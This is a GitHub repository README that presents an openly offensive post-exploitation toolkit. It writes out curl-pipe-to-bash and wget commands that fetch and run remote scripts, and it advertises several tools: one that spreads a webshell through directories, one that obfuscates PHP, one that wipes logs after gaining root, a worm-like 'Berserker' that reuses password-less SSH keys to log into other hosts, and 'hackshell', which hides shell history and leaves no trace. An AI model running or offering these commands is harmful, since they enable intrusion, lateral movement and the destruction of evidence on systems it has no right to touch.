Skip to content

saxdales/tools

 
 

Repository files navigation

netstat if there is no netstat/ss/lsof:

curl -fsSL https://raw.githubusercontent.com/oxygencall/tools/master/awk_netstat.sh | bash

Show all domains hosted on a server + system-information :

curl -fsSL https://raw.githubusercontent.com/oxygencall/tools/master/what_server.sh | bash

Spreading your webshell to the deepest destination folder

wget https://raw.githubusercontent.com/oxygencall/tools/master/dor

Encrypt ur PHP Code

php ob.php

Clear all logs if gain root

wget https://raw.githubusercontent.com/oxygencall/tools/master/clear.sh

The Berserker looks for password-less ssh-keys (such as ~/.ssh/id_rsa) and then attempts to log in to as many hosts as possible. It repeats its action recursively. All this without writing or installing any data on any host. It’s an in-memory infiltration only.

export BS="$(curl -fsSL https://raw.githubusercontent.com/oxygencall/tools/master/bs)" && bash -c "BS_DEPTH=1 $BS"

# hackshell
Make BASH stealthy and hacker friendly with lots of bash functions

Usage:
```shell
 source <(curl -SsfL https://thc.org/hs)
 source <(curl -SsfL https:/hackerschoice/hackshell/raw/main/hackshell.sh)

Some features:

  • unsets HISTFILE, SSH_CONNECT, wget/redis/mysql/less-HISTORY, ...
  • Upgrates to PTY shell (if reverse shell)
  • Creates hacker-friendly shortcuts, bash-functions and aliases
  • Static binary download by simple bin <command> (e.g. bin nmap)
  • Does not write ANY data to the harddrive
  • Leaves no trace

hackshell

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 61.0%
  • Shell 37.1%
  • Hack 1.1%
  • Other 0.8%